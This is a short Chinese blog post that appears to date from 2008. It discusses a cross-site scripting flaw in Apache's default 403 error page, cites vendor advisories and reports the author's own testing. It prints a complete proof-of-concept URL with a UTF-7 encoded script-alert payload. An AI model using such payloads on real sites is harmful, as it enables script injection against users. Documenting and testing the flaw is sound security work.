Apache HTTP 服务器 403 Error 页面跨站脚本漏洞

最近闹地震，上个网都不安心，只有在网上瞎逛，到绿盟看看漏洞公告，绿盟昨日公布一个 Apache HTTP 服务器 403 Error 页面跨站脚本漏洞。

漏洞公告链接：

• http://www.nsfocus.net/vulndb/11875
• http://marc.info/?l=bugtraq&m=121034653105913&w=2

漏洞所产生的原因是如果使用 Apache Server 默认的 Forbidden 403 错误页面，那么可以产生跨站漏洞，我按测试方法测试并未成功。绿盟并没有太详细描述，经过在国外安全站搜寻，得知 Forbidden 403 页面在处理 UTF-7 字符上而产生的 XSS。

漏洞公告所述，出现在 Apache Group Apache 2.2.* 和 Apache Group Apache 1.3.* 两个版本上，但我在 2.0.61 版本上依然测试成功。

安装 Apache v2.2.8 后提交以下 URL:

http://localhost/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthep
WhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdaz
OG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1S
QPhU5VReCz1olPh5jZDEFACED<!xc+ADw-script+AD4-alert('www.hoversnow.com.cn')
+ADw-/script+AD4---//--

由于是在处理 UTF-7 字符上产生漏洞，需要点击鼠标右键，把编码中的自动选择勾上，然后 XSS 测试成功。